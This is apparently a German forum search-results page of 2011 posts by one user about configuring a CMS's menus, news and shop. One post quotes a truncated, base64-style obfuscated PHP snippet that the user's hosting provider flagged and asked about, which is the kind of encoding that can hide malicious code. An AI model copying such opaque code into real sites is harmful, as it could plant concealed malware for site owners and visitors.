Sie sind nicht angemeldet.

Suchergebnisse

Suchergebnisse 1-6 von insgesamt 6.

Dienstag, 6. Dezember 2011, 19:28

Forenbeitrag von: »Mastercontrol«

Frage an den der es Programiert hat

na das ist doch eine aussage, die ich so weiter geben kann. mehr wollte ich zu dem code nicht wissen. son billig paket isset nicht. nur es will einfach nicht funktionieren. na dann wird sich morgen die technik drum kümmern müssen danke dir für deine antwort

Dienstag, 6. Dezember 2011, 18:16

Forenbeitrag von: »Mastercontrol«

Frage an den der es Programiert hat

Hi, mein Provider lässt fragen, was der Code ($_F=__FILE__;$_X='P2lCP1ouWlZWVlZNenpPel96TVpPej1zSHgoS19GSUk+Xj5LX0U3VDMvSyk7VlZ6TXZRc3pNX09IMk0+J3NIMldROU1uaFlxbnZXWHNIMlhaLlonO1Z6TXZRc3pNX09IMk0+J2U5WXNIaHNIMmhBUUgyPXNPSG5oMldlbm5Yc0gyWFouWic7VlYkQXpPSD1NSDlyUUgyPXNPSG4+Uz5PWk1IOXN6KCdzSDJXUTlNbmhBUUgyPXNPSG4nKTtWCVZ9LnNXTT4oJEF6T0g9TUg5clFIMj1zT0g+Uz56TWU5OXN6PigkQXpPSD1NSDlyUUgyPXNPSG4pKT5dVlYJc0E+KCFzbl85c3ooJ3NIMldROU1uaEFRSDI9c09IbmgnWCRBek9IPU1IOXJRSDI9c09IKT4mJj4kQXpPSD1NSDlyUUgyPXNPSD4h...

Sonntag, 25. September 2011, 12:29

Forenbeitrag von: »Mastercontrol«

Menü im CMS

Nun habe ich es laufen und jede Seite anders gesetzt. Jetzt kann ich unterseiten zu dem entsprechenden Themen aufbauen. Meine nächste Frage. Würde gerne einen Onlineshop hinzufügen. Jemand eine Idee? Auch was die Verlinkung angeht.

Donnerstag, 22. September 2011, 20:58

Forenbeitrag von: »Mastercontrol«

Menü im CMS

Das habe ich doch laufen. Doch wieso ist es so. Habe ich etwas falsch gemacht? Die nächste frage ist auch wieso kann ich keine News sehen? Oder wie soll man den auf die Startseite einbinden?

Donnerstag, 22. September 2011, 17:35

Forenbeitrag von: »Mastercontrol«

Menü im CMS

Danke für deine Antwort. Nun das Template gefällt mir von den Farben ganz gut. Wie baue ich es um auf 4 Ebenen? Oder gibt es eines in den Farben? Zitat von »emet« So wie es aussieht hast du einfach jede Menge Menupunkte als Submenu unter die Startseite gestellt. Das ist absolut sinnlos und so sind die Menulinks unter der Startseite alle offen. Ist wohl auch sonst irgendwie was faslch gelaufen. Das Template mit dem Fullmenu unterstützt 2 Menuebenen - solltest evtl eins nehmen für die 3.9.3 was 4 ...

Dienstag, 20. September 2011, 22:22

Forenbeitrag von: »Mastercontrol«

Menü im CMS

Hi Leute, bin neu hier und habe auch gleich ne frage. Wie bekomme ich dieses Menü auf die linke Seite? Derzeit ist es doch etwas voll geworden astri24.de/cms wäre echt hilfreich. besten dank schon einmal FB_Addon_TelNo{ height:15px !important; white-space: nowrap !important; background-color: #0ff0ff;}